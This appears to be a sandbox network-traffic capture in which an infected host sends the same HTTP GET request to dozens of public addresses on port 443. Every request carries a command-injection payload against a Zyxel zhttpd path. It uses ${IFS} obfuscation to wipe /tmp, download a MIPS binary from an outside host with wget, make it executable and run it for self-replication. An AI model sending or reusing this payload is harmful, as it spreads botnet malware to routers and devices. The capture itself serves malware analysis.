                        2826192.168.2.1448752154.190.172.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205311060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2827192.168.2.144928075.224.52.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205372095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2828192.168.2.1450242179.191.39.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205400944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2829192.168.2.1451712193.225.192.72443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205463886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2830192.168.2.143875457.92.243.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205509901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2831192.168.2.144508296.217.252.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205543041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2832192.168.2.1451500100.32.35.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205575943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2833192.168.2.1459056175.179.24.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205617905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2834192.168.2.144088077.250.36.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205667019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2835192.168.2.1446618191.242.140.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205710888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2836192.168.2.1438886178.162.75.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205765009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2837192.168.2.1444300205.207.209.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205802917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2838192.168.2.145283243.196.89.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205828905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2839192.168.2.144477494.64.172.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205862045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2840192.168.2.143378068.12.31.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205915928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2841192.168.2.143983693.62.108.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.205949068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2842192.168.2.143559276.230.44.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206012964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2843192.168.2.1443812218.98.247.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206049919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2844192.168.2.144108287.208.174.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206089973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2845192.168.2.1443998208.54.115.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206124067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2846192.168.2.1433776164.212.201.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206162930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2847192.168.2.145904480.36.94.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206211090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2848192.168.2.143335049.54.148.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206263065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2849192.168.2.1435852174.99.204.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206300020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2850192.168.2.1453270129.103.24.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206320047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2851192.168.2.143759858.146.72.234443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206356049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2852192.168.2.1451576148.91.130.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206404924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2853192.168.2.144721253.190.2.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206424952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2854192.168.2.143693632.108.219.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206429005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2855192.168.2.14511128.205.130.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206459999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2856192.168.2.1442550142.70.207.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206500053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2857192.168.2.144782267.15.33.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206536055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2858192.168.2.143439063.15.72.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206557989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2859192.168.2.143524618.50.74.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206567049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2860192.168.2.1441472168.150.171.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206579924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2861192.168.2.1455174175.99.222.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206634045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2862192.168.2.1455024222.123.98.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206659079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2863192.168.2.1442534117.198.176.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206731081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2864192.168.2.145378646.75.77.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206732035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2865192.168.2.1451090196.2.23.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206774950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2866192.168.2.1451222104.224.111.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206819057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2867192.168.2.1457340205.132.25.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206871986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2868192.168.2.144774820.131.176.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206934929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2869192.168.2.144703274.206.2.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.206984043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2870192.168.2.14337028.17.30.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207005024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2871192.168.2.1439010117.5.28.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207065105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2872192.168.2.1443640125.230.184.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207109928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2873192.168.2.144126075.8.177.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207114935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2874192.168.2.144516057.101.99.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207178116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2875192.168.2.1434006109.60.97.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207202911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2876192.168.2.1439408204.202.167.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207247019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2877192.168.2.145399680.83.236.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207284927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2878192.168.2.1440956219.101.95.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207338095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2879192.168.2.1439142202.120.176.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207370043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2880192.168.2.1453190131.166.195.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207418919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2881192.168.2.145769844.200.243.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207458973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2882192.168.2.145810095.193.241.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207518101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2883192.168.2.1439848218.225.138.234443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207568884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2884192.168.2.14518921.79.6.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207614899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2885192.168.2.1435112207.74.136.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207644939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2886192.168.2.1448186149.53.219.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207690001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2887192.168.2.1447594195.18.208.59443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207751036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2888192.168.2.1448808145.233.197.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207772970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2889192.168.2.144029419.90.108.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207811117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2890192.168.2.1457638153.158.44.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207844973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2891192.168.2.144612084.120.207.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207881927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2892192.168.2.144870889.162.145.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207935095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2893192.168.2.1444866217.233.129.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.207973003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2894192.168.2.144547014.203.195.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208024025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2895192.168.2.1446146158.201.244.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208070993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


